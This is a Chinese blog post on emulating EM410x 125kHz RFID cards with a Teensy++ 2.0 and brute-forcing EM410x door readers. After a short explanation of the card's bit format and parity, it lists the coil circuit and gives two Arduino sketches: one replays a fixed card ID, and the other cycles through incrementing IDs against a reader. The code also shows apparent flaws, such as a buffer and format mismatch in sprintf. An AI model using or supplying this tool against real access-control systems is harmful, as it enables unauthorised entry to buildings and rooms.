# 利用Teensy进行EM410x卡模拟以及暴力破解EM410X类门

• A+

## 什么是低频？以下就是低频的解释：

1 1 1 1 1 1 1 1 1                                          9bits头
8 bits版本或厂商ID
D00 D01 D02 D03 P0
D10 D11 D12 D13 P1
D20 D21 D22 D23 P2
D30 D31 D32 D33 P3
D40 D41 D42 D43 P4      10bits行检验
D50 D51 D52 D53 P5
32bits数据                           D60 D61 D62 D63 P6
D70 D71 D72 D73 P7
D80 D81 D82 D83 P8
D90 D91 D92 D93 P9
PC0 PC1 PC2 PC3 S0
4位列校验

0005206306

0x0600503472

111111111

0 = 0000 0
6 = 0110 0
0 = 0000 0
0 = 0000 0
5 = 0101 0
0 = 0000 0
3 = 0011 0
4 = 0100 1
7 = 0111 1
2 = 0010 1
p = 0001 （列偶校验位）
0 结束

111111111 00000 01100 00000 00000 01010 00000 00110 01001 01111 00101 00010

## 利用Teensy模拟EM410x Tag

1. 基于125kHz的低频线圈
2. 电容
3. 三极管 2N3904
4. 电阻 10K
5. Teensy++ 2.0

F 频率 L 电感 C 电容

Teensy++ 2.0模拟EM410x代码如下:

#!c#
String sStart = "1111111110000000000";//
String sStop = "0";
int data_to_spoof[64];
int coil_pin = 9;
int a,b,c,d;
unsigned long id;
char HexCode[8];

void setup()
{
// Serial.begin(9600);
pinMode(coil_pin, OUTPUT);
digitalWrite(coil_pin, LOW);
id = 0x503472;
a=0;b=0;c=0;d=0;
sprintf(HexCode,"%04X%04X",id);
String s = sStart + Em4xCode(HexCode[4]) + Em4xCode(HexCode[5]) + Em4xCode(HexCode[6]) + Em4xCode(HexCode[7]) + Em4xCode(HexCode[0]) + Em4xCode(HexCode[1]) + Em4xCode(HexCode[2]) + Em4xCode(HexCode[3]) + EvenParity(a) + EvenParity(b) + EvenParity(c) + EvenParity(d) + sStop;
// Serial.println(s);
toCode(s);

}

void set_pin_manchester(int clock_half, int signal)
{
int man_encoded = clock_half ^ signal;
if(man_encoded == 1)
{
digitalWrite(coil_pin, HIGH);
}
else
{
digitalWrite(coil_pin, LOW);
}
}

String Em4xCode(String code)
{
if (code == '1') {d+=1;return "00011";}
if (code == '2') {c+=1;return "00101";}
if (code == '3') {c+=1;d+=1;return "00110";}
if (code == '4') {b+=1;return "01001";}
if (code == '5') {b+=1;d+=1;return "01010";}
if (code == '6') {b+=1;c+=1;return "01100";}
if (code == '7') {b+=1;c+=1;d+=1;return "01111";}
if (code == '8') {a+=1;return "10001";}
if (code == '9') {a+=1;d+=1;return "10010";}
if (code == 'A') {a+=1;c+=1;return "10100";}
if (code == 'B') {a+=1;c+=1;d+=1;return "10111";}
if (code == 'C') {a+=1;b+=1;return "11000";}
if (code == 'D') {a+=1;b+=1;d+=1;return "11011";}
if (code == 'E') {a+=1;b+=1;c+=1;return "11101";}
if (code == 'F') {a+=1;b+=1;c+=1;d+=1;return "11110";}
return "00000";
}

String EvenParity(int Parity)
{
if ((Parity % 2) == 1) return "1";
return "0";
}

void toCode(String s)
{
for(int i = 0; i < 64; i++)
{
if (s[i]=='0'){data_to_spoof[i]=0;}else{data_to_spoof[i]=1;}
}
}
void loop()
{
for(int i = 0; i < 64; i++)
{
set_pin_manchester(0, data_to_spoof[i]);
delayMicroseconds(256);
set_pin_manchester(1, data_to_spoof[i]);
delayMicroseconds(256);
}
}

111111111 00000 01100 00000 00000 01010 00000 00110 01001 01111 00101 00010

#!c#
String sStart = "1111111110000000000";
String sStop = "0";
int data_to_spoof[64];
int led = 6;
int coil_pin = 9;
int a,b,c,d;
unsigned long id;
char HexCode[8];

void setup()
{
// Serial.begin(9600);
pinMode(led, OUTPUT);
pinMode(coil_pin, OUTPUT);
digitalWrite(coil_pin, LOW);
id = 0x502E96;
}

void set_pin_manchester(int clock_half, int signal)
{
int man_encoded = clock_half ^ signal;
if(man_encoded == 1)
{
digitalWrite(coil_pin, HIGH);
}
else
{
digitalWrite(coil_pin, LOW);
}
}

String Em4xCode(String code)
{
if (code == '1') {d+=1;return "00011";}
if (code == '2') {c+=1;return "00101";}
if (code == '3') {c+=1;d+=1;return "00110";}
if (code == '4') {b+=1;return "01001";}
if (code == '5') {b+=1;d+=1;return "01010";}
if (code == '6') {b+=1;c+=1;return "01100";}
if (code == '7') {b+=1;c+=1;d+=1;return "01111";}
if (code == '8') {a+=1;return "10001";}
if (code == '9') {a+=1;d+=1;return "10010";}
if (code == 'A') {a+=1;c+=1;return "10100";}
if (code == 'B') {a+=1;c+=1;d+=1;return "10111";}
if (code == 'C') {a+=1;b+=1;return "11000";}
if (code == 'D') {a+=1;b+=1;d+=1;return "11011";}
if (code == 'E') {a+=1;b+=1;c+=1;return "11101";}
if (code == 'F') {a+=1;b+=1;c+=1;d+=1;return "11110";}
return "00000";
}

String EvenParity(int Parity)
{
if ((Parity % 2) == 1) return "1";
return "0";
}

void toCode(String s)
{
for(int i = 0; i < 64; i++)
{
if (s[i]=='0'){data_to_spoof[i]=0;}else{data_to_spoof[i]=1;}
}
}
void loop()
{
a=0;b=0;c=0;d=0;
sprintf(HexCode,"%04X%04X",id);
String s = sStart + Em4xCode(HexCode[4]) + Em4xCode(HexCode[5]) + Em4xCode(HexCode[6]) + Em4xCode(HexCode[7]) + Em4xCode(HexCode[0]) + Em4xCode(HexCode[1]) + Em4xCode(HexCode[2]) + Em4xCode(HexCode[3]) + EvenParity(a) + EvenParity(b) + EvenParity(c) + EvenParity(d) + sStop;
// Serial.println(s);
toCode(s);
for(int ii = 0; ii < 2; ii++)
{
for(int i = 0; i < 64; i++)
{
set_pin_manchester(0, data_to_spoof[i]);
delayMicroseconds(265);
set_pin_manchester(1, data_to_spoof[i]);
delayMicroseconds(265);
}
}
if (id == 0x50308A){digitalWrite(led, HIGH);}
id += 1;
if (id > 0xFFFFFFFF ){id=0;}
}

• 我的微信
• 这是我的微信扫一扫
• 我的微信公众号
• 我的微信公众号扫一扫